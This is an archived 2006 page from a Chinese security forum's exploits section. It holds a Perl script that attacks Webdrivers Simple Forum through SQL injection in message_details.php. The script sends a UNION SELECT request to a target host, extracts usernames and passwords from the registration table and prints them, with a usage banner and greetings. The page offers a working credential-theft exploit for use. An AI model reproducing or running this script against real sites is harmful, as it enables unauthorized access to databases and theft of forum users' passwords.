"$host",PeerPort=>80)or die ("[-]Error\n");print "[~ ... 邪恶八进制信息安全团队技术讨论组 国内为数不多的技术与管理并举的专业信息安全团队 - Discuz! Archiver" /> Webdrivers Simple Forum (message_details.php) SQL Injection Exploit(页 1) - 安全测试代码{ Exploits and Shellcode } - 邪恶八进制信息安全团队技术讨论组 努力为祖国的信息安全撑起一片蓝天 - Archiver

邪恶八进制信息安全团队技术讨论组's Archiver

pub!1c 2006-11-6 12:17

Webdrivers Simple Forum (message_details.php) SQL Injection Exploit

[code]
#!perl
use IO::Socket;
#Download:[url]http://www.thewebdrivers.com/forum.zip[/url]
#By:Bl0od3r
#Germany =]
if (@ARGV<3) {
&header;
} else {
&get();
}
sub get() {
$host=$ARGV[0];
$path=$ARGV[1];
  $id=$ARGV[2];
$socket=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>80)
or die ("[-]Error\n");
print "[~]Connecting!\n";
print "[~]Getting Data!\n";
print $socket "GET ".$path."message_details.php?id=-1%20UNION%20SELECT%201,password,username,4,4%20FROM%20tbl_register WHERE id=".$id."/* HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

while ($ans=<$socket>) {
$ans=~ m/<span class="style3"> Re :  -(.*?)-/ && print "--------------------------------------------\n[+]UserName: $1\n[+]PassWord:";
$ans=~ m/<td class=\"text\">(.*?)<\/td>/ && print "$1\n";
if ($1) {
$success=1; } else { $success=0;};
}
if ($success=="1") {
print "\n[+]Successed!";
  } else {
print "[-]Error";
   }
  }
sub header() {
print
"--------------------------------------------------------------------\n";
print "|\t---------->By Bl0od3r<---------\t\t\t\t   |";
print "\n|Usage:script.pl host.com /path/ 1\t\t\t\t   |";
print
"\n--------------------------------------------------------------------\n";
exit;
}

# greetz to all dc3 members,matrix_killer and skOd =]
[/code]

页: [1]
© 1999-2008 EvilOctal Security Team